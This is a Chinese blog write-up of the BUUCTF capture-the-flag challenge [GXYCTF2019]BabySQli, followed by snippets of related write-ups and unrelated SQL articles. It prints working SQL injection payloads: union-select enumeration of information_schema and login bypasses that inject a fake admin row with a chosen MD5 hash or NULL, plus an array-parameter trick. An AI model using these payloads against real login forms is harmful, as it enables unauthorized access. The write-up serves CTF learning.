[GXYCTF2019]BabySQli

最新推荐文章于 2024-08-09 09:47:03 发布
最新推荐文章于 2024-08-09 09:47:03 发布
阅读量274 收藏
点赞数 1
分类专栏: BUUctf web 文章标签: sql mysql 经验分享 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/140411542
版权

原题目描述:刚学完sqli,我才知道万能口令这么危险,还好我进行了防护,还用md5哈希了密码!

我看到是个黑盒先想着搞一份源码
在这里插入图片描述
我dirsearch明明扫到了.git,算了直接注入试试看
随便输入了两个东西,发现源码有提示
在这里插入图片描述
全是大写字母,base32解码一下,然后再base64解码
在这里插入图片描述
在这里插入图片描述

select * from user where username = '$name'
找到注入点name

我第一个写的是这样的

1'union(select)1,2,3'

结果不行,后面把()删除了就可以了

1'union select 1,(select group_concat(schema_name) from infoorrmation_schema.schemata),3'

写联合注入,不行,没有绕过白名单
在这里插入图片描述
换个思路,不爆数据了,我们不是要登录嘛,题目提示密码被md5了
本地尝试一下
在这里插入图片描述
成功了,md5我们直接用数组绕过即可
在这里插入图片描述
不准用?
后面想了一下数组绕过的原理是md5无法正确处理那写个NULL

name=1'union select 1,'admin',NULL'&pw[]=123

或者那就在线加密一下

name=1'union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b''&pw=1
我这么写回显说是错的但是我想着应该不会错,代入原句
select * from user where username = '1'union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b'''

多了一个空所以应该不能正常解析,我们换成闭合

name=1'union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b'--+&pw=1
baozongwi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GXYCTF2019--BabySQli
Oavinci的博客
06-28 735
知识点: 查询数据不存在时,联合查询会构造一个虚拟的数据在数据库中。 随意输入点击登录,查看源代码得到一串字符串 base32+base64解码得到: select * from user where username = '$name' fuzz一下发现过滤了一些字符串。首先大写绕过"Order by 3#",查询列数为3,猜测为id,username,password。 这题考察的是用户名和密码分开检验,先将username对应的字段查出来后,再检验password和查出来的密码能不能
[GXYCTF 2019]BabySqli
Aiwin的博客
08-10 1435
[GXYCTF 2019]BabySqli
[GXYCTF2019]BabySQli 1
qq_44724114的博客
05-06 507
4. 用union联合注入,不知道是不是hackbar的问题,说我的sql语法有错,用bp抓包,修改就没问题(百思不得其解)。202cb962ac59075b964b07152d234b70这个是123通过MD5解密而来的数据。要注意 name=1’不能写成=admin’ 这样会查询到两个admin账户,要使只有我们现在查询的admin,只能union前面查询的数据没有显示才行。再一次进行base64解密,得到sql语句。进行一次base32解密。
GXYCTF2019 babysqli
weixin_45751765的博客
09-09 277
0x00 初试 一开始以为普通sql注入题 fuzz一下没过滤什么东西 or大小写直接绕过就行,但两个括号绕过之前倒没遇上过,尝试了各种编码好像也没用…
[GXYCTF2019]BabySQli1
m0_62706061的博客
10-17 1243
ctf
[GXYCTF2019]BabySQli1-BUUCTF
chinese_cabbage0的博客
02-05 923
主要是一个buuctf题目的解题过程,大家可以参考一下
BUUCTF——[GXYCTF2019]BabySQli
Ho1aAs‘s Blog
05-27 1183
文章目录利用点解题分析完 利用点 SQL字符型注入 UNION SELECT联合查询特性 解题 search.php的注释发现hint <!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5--> 先base32再base64 select * from user where username = '$name' 明白了查询语句,先试试admi
BUUCTF | [GXYCTF2019]BabySQli
m_de_g的博客
12-25 2547
BUUCTF | [GXYCTF2019]BabySQli 一、必备基础知识 当=号被过滤了使用like,rlike绕过 当or被过滤了使用大小写绕过,双写绕过,&&绕过 二、实战化渗透 [GXYCTF2019]BabySQli 因为本道题目的请求方式是POST,直接上手抓包,便于我们方便测试 1.使用1'#进行简单的测试,报错 2. ...
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
### CTF-WEB[GXYCTF 2019]BabyUpload分析 #### 知识点一:Web安全中的文件上传漏洞 在本题目中,我们面对的是一个典型的Web安全问题——文件上传漏洞。文件上传漏洞是Web应用程序中最常见的安全漏洞之一,它允许...
精美网页模版,橙色政府网站建设
05-09
模板介绍: 风格清晰大气,结构规整,内置工作流,信息签收、信息签发、互动交流等常用政府网站功能,相对其他模板,此模板增加了网站常用一些参数统计和投稿统计,主要功能全部采用自定义模型,可以任意扩展字段和...
C#做的超市管理系统。
11-17
《C#实现的超市管理系统详解》 在信息技术日益发达的今天,各类管理系统已经渗透到各行各业,其中超市管理系统作为零售业的重要组成部分,对于提升运营效率、优化库存管理具有重要作用。本系统采用C#编程语言和SQL ...
Dav_笔记12:Automatic SQL Tuning 之 5 managing SQL Profiles
Dav_2099的博客
08-07 1094
SQL配置文件包含对自动SQL调整期间发现的较差优化程序估计值的更正。此信息可以改进优化器基数和选择性估计,从而导致优化器选择更好的计划。SQL配置文件不包含有关各个执行计划的信息。相反,优化程序在选择计划时具有以下信息源:■环境,包含数据库配置,绑定变量值,优化程序统计信息,数据集等■SQL配置文件中的补充统计信息如果环境或SQL配置文件发生更改,则优化程序可以创建新计划。您可以使用SQL配置文件,无论是否有SQL计划管理。如果使用SQL计划管理,则优化程序选择的计划必须是已启用的计划基准。
kubernetes集群部署sql server数据库服务
jiang0615csdn的博客
08-08 429
kubernetes集群部署sql server数据库服务
dbeaver 导入sql 报错,ERROR 2059 (HY000)
hyq_07_27的博客
08-07 223
ERROR 2059 (HY000): Authentication plugin ‘caching_sha2_password’ cannot be loaded: 鎵句笉鍒版寚瀹氱殑妯″潡銆�。下载后解压压缩包,点击“添加数据库地址”按钮,选择新的MySQL8的所在目录.再次导入就可以了。可以下载 MySQL免安装版配置教程mysql-8.0.39-winx64.zip。先mysql连接设置,查看一下dbeaver的mysql 版本,是5.5.62.版本问题,MySQL8之后更换了密码认证策略。
MyBatis 如何通过拦截器修改 SQL
Hello World
08-03 544
假如我们想实现多租户,或者在某些 SQL 后面自动拼接查询条件。在开发过程中大部分场景可能都是一个查询写一个 SQL 去处理,我们如果想修改最终 SQL 可以通过修改各个 mapper.xml 中的 SQL 来处理。但实际过程中我们可能穿插着 ORM 和 SQL 的混合使用,隐藏在代码中不容易被发现,还有假如项目中有很多很多的 SQL 我们不可能一个一个的去修改解决。这个时候我们就需要通过 mybatis 拦截 SQL 并且最终修改 SQL。实现Interceptor接口,并写相关逻辑。
达梦数据库(十) -------- mybatis-plus 整合达梦时,自动生成的 sql 语句报错
最新发布
weixin_52466601的博客
08-09 412
问题原因:mybatis-plus 生成的 sql 语句字段是小写的,同时还包含数据库关键字。框架会默认加上(`)符号,该符号在达梦数据库中无法被识别,需要更换为 (")。方案二:修改实体类的字段名称避免使用达梦数据库关键字。
C++ SQL ORM
一个大佬的博客
08-07 500
【代码】C++ SQL ORM。
sqliabs靶场练习
Zombie_QP的博客
08-06 487
到这里咋们就可以获取当前数据名和版本号,这个就涉及mysql数据库的一些命令了。Select @@GLOBAL.VERSION 数据库版本信息。system_user() 数据库系统用户账户名称和登录主机名。@@version_compile_os——操作系统版本。这里提示我们输入数字值的ID作为参数,我们输入?current_user() 当前登录用户和登录主机名。Select VERSION() 数据库版本信息。Select @@VERSION 数据库版本信息。@@datadir——数据库路径。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值